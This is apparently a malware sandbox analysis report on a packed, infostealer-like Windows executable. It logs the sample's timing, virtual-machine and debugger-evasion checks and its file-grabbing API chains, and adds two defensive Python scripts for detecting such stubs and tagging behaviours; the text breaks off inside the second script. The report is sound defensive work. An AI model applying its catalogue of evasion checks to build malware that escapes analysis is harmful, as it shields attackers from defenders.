                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C4F8 second address: 83C4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84961F second address: 849633 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8497FB second address: 849805 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5ED52EEF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84D13B second address: 84D145 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8543EB second address: 85442D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5ED52EEF83h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5ED52EEF83h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8592BB second address: 859301 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5ED4EAF476h 0x00000008 jmp 00007F5ED4EAF47Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5ED4EAF487h 0x00000014 push edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 jmp 00007F5ED4EAF47Fh 0x0000001c pop edi 0x0000001d popad 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859301 second address: 859314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859314 second address: 859321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85DBAF second address: 85DBC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862FB9 second address: 862FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862FBD second address: 862FC9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5ED52EEF76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862FC9 second address: 862FDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F5ED4EAF480h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868731 second address: 86874E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5ED52EEF80h 0x00000008 js 00007F5ED52EEF76h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688C0 second address: 8688C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688C9 second address: 8688CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688CF second address: 8688DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF47Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868A3E second address: 868A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868BAF second address: 868BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868BB5 second address: 868BD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5ED52EEF84h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D55 second address: 868D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007F5ED4EAF476h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D67 second address: 868D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D6D second address: 868D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F5ED4EAF478h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D7A second address: 868D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8691B1 second address: 8691CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF483h 0x00000007 jo 00007F5ED4EAF47Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FE47 second address: 86FE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FE50 second address: 86FE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5ED4EAF482h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FE69 second address: 86FE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FE6F second address: 86FE79 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FE79 second address: 86FE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jne 00007F5ED52EEF76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87C992 second address: 87C99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F5ED4EAF476h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87C99F second address: 87C9A9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5ED52EEF7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7886CE second address: 7886D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87E231 second address: 87E235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87E235 second address: 87E24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jo 00007F5ED4EAF476h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 88B1EF second address: 88B203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF7Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89D64F second address: 89D655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89D655 second address: 89D66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F5ED52EEF7Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89D92B second address: 89D931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89D931 second address: 89D93F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F5ED52EEF76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89DF32 second address: 89DF37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89DF37 second address: 89DF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF81h 0x00000009 jne 00007F5ED52EEF76h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F5ED52EEF7Ah 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e pushad 0x0000001f jo 00007F5ED52EEF76h 0x00000025 push edx 0x00000026 pop edx 0x00000027 jmp 00007F5ED52EEF7Fh 0x0000002c popad 0x0000002d push edi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89E0E3 second address: 89E0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89E0E9 second address: 89E0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89E270 second address: 89E276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89E276 second address: 89E27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89E27A second address: 89E284 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89FE36 second address: 89FE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A13CC second address: 8A13D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A3F78 second address: 8A3F96 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5ED52EEF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F5ED52EEF78h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A4185 second address: 8A419D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF484h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF0249 second address: 4EF024F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 611B71, instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7B914C, instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 83E6B6, instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc (display-adapter device class; the value names the virtual GPU under VirtualBox or VMware)
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion (both BIOS strings carry hypervisor vendor names on a guest)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003C38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003C4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003BDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_003BE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_003BED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003C4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_003BBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003C3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003B16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B1160 GetSystemInfo,ExitProcess,0_2_003B1160
Source: file.exe, file.exe, 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2239077197.00000000011E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware]&/
Source: file.exe, 00000000.00000002.2239077197.00000000011B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: file.exe, 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please, (Oreans.vxd and Software\WinLicense are strings of the Oreans Themida/WinLicense protector, which also owns the .taggant entry section listed under file info)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13578)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13581)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13599)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13633)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13593)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
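The 28 RDTSC interceptor hits above all have the same shape: two rdtsc reads with nothing but push/pop, pushad/popad and short jumps between them, so the measured delta covers only filler and anything large, or anything a hooked rdtsc returns, is taken as a debugger or emulator. That is the stub an Oreans protector emits (the report's own memory strings name Oreans.vxd and Software\WinLicense). The scanner below is an added example written for this page, not code from the sample, from Joe Sandbox or from Oreans: it finds such pairs statically in a byte buffer by decoding only the filler subset, and prints them in the report's "First address / second address / instructions" form. The sample bytes are constructed for illustration; the base address 0x87E231 is borrowed from the report so the first constructed pair reproduces the logged 87E231/87E235 hit.

```python
"""Static finder for rdtsc pairs separated only by filler instructions.

Added example for this report (not Joe Sandbox or sample code). It decodes the
small x86 subset that protector stubs put between two rdtsc reads (push/pop,
pushad/popad, short and near jumps) and reports every pair it can reach.
"""
from typing import List, Optional, Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
JCC = ["jo", "jno", "jb", "jae", "je", "jne", "jbe", "ja",
       "js", "jns", "jp", "jnp", "jl", "jge", "jle", "jg"]


def decode_filler(buf: bytes, off: int) -> Optional[Tuple[str, int, Optional[int]]]:
    """Decode one instruction at buf[off] if it belongs to the filler subset.

    Returns (mnemonic, length, jump_target) or None for anything else, so the
    walk stops as soon as real code (xor, mov, call, ...) appears.
    """
    b = buf[off]
    if b == 0x0F and off + 1 < len(buf) and buf[off + 1] == 0x31:
        return ("rdtsc", 2, None)
    if 0x50 <= b <= 0x57:
        return ("push " + REG32[b - 0x50], 1, None)
    if 0x58 <= b <= 0x5F:
        return ("pop " + REG32[b - 0x58], 1, None)
    if b == 0x60:
        return ("pushad", 1, None)
    if b == 0x61:
        return ("popad", 1, None)
    if 0x70 <= b <= 0x7F and off + 1 < len(buf):          # jcc rel8
        rel = int.from_bytes(buf[off + 1:off + 2], "little", signed=True)
        return (JCC[b - 0x70], 2, off + 2 + rel)
    if b == 0xEB and off + 1 < len(buf):                  # jmp rel8
        rel = int.from_bytes(buf[off + 1:off + 2], "little", signed=True)
        return ("jmp", 2, off + 2 + rel)
    if b == 0xE9 and off + 4 < len(buf):                  # jmp rel32
        rel = int.from_bytes(buf[off + 1:off + 5], "little", signed=True)
        return ("jmp", 5, off + 5 + rel)
    return None


def find_rdtsc_pairs(buf: bytes, base: int = 0, max_insns: int = 48) -> List[Tuple[int, int, List[str]]]:
    """Return (first_addr, second_addr, trace) for every rdtsc that reaches a
    second rdtsc through filler only. Unconditional jumps are followed; a
    conditional jump is recorded and the walk falls through, as the sandbox
    trace does; an unknown opcode or a loop ends the walk without a pair."""
    pairs = []
    for start in range(len(buf) - 1):
        if buf[start] != 0x0F or buf[start + 1] != 0x31:
            continue
        trace, off, visited = ["rdtsc"], start + 2, set()
        for _ in range(max_insns):
            if off >= len(buf) or off in visited:
                break
            visited.add(off)
            decoded = decode_filler(buf, off)
            if decoded is None:
                break
            mnem, length, target = decoded
            trace.append(mnem if target is None else f"{mnem} {base + target:#x}")
            if mnem == "rdtsc":
                pairs.append((base + start, base + off, trace))
                break
            off = target if mnem == "jmp" else off + length
    return pairs


# Constructed sample bytes (not taken from the binary): three rdtsc groups; the
# middle one has real work (xor eax, eax) in between and must not be reported.
SAMPLE = bytes([
    0x0F, 0x31, 0x50, 0x52, 0x0F, 0x31,           # 0x00: rdtsc; push eax; push edx; rdtsc
    0x5A, 0x58, 0x90,                             # 0x06: pop edx; pop eax; nop
    0x0F, 0x31, 0x31, 0xC0, 0x0F, 0x31, 0x90,     # 0x09: rdtsc; xor eax, eax; rdtsc; nop
    0x0F, 0x31, 0xEB, 0x02, 0xCC, 0xCC,           # 0x10: rdtsc; jmp +2 over two int3 bytes
    0x50, 0x52, 0x52, 0x5A, 0x0F, 0x31, 0xC3,     # 0x16: push eax; push edx; push edx; pop edx; rdtsc; ret
])

if __name__ == "__main__":
    # Base 0x87E231 reproduces the report's "First address: 87E231 second address: 87E235" hit.
    for first, second, trace in find_rdtsc_pairs(SAMPLE, base=0x87E231):
        print(f"First address: {first:X} second address: {second:X} instructions: {' '.join(trace)}")
```

Run against a dumped code section (the unpacked 0.2.file.exe.3b0000.0.unpack, for instance) with base set to the section's virtual address, the output lines can be compared one-to-one with the interceptor entries above; a pair that the static walk finds but the sandbox never logged is a stub that only runs on a code path the analysis did not reach.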

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger (NtSetInformationThread with ThreadHideFromDebugger: the thread no longer reports debug events to an attached debugger)
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass (Regmon)
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo (OllyDbg)
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class (Process Monitor)
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg (OllyDbg)
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass (Filemon)
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE (SoftICE driver device names; opening them succeeds only when the kernel debugger is loaded)
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort (NtQueryInformationProcess with ProcessDebugPort)
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_003B45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9750 mov eax, dword ptr fs:[00000030h] 0_2_003C9750 (fs:[30h] is the PEB pointer in the 32-bit TEB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C7850
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
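The "Code function" lines are the part of this report that is most useful for writing rules, because each one is the API sequence of a single function in the unpacked payload: FindFirstFileA followed by two StrCmpCA calls is the standard loop that skips "." and "..", and with CopyFileA/DeleteFileA it is a file grabber; dozens of GetProcAddress calls in one function is the import-resolution stub; mov eax, fs:[30h] is a PEB read; CreateToolhelp32Snapshot/Process32Next (in the next section) is process enumeration. The parser below is an added example, not code from Joe Sandbox or from the sample: it turns such lines, copied verbatim from this report, into function id plus API list and tags each function with a behaviour. The tag names and the GetProcAddress threshold are my own choices.

```python
"""Parse Joe Sandbox "Code function" signature lines and tag each function with
the behaviour its API chain implies. Added example for this page; tags and
thresholds are the editor's, not Joe Sandbox's."""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Lines copied verbatim from this report (raw strings: the paths contain backslashes).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003C38B0",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003BDA80",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B45C0 VirtualProtect ?,00000004,00000100,000000000_2_003B45C0",
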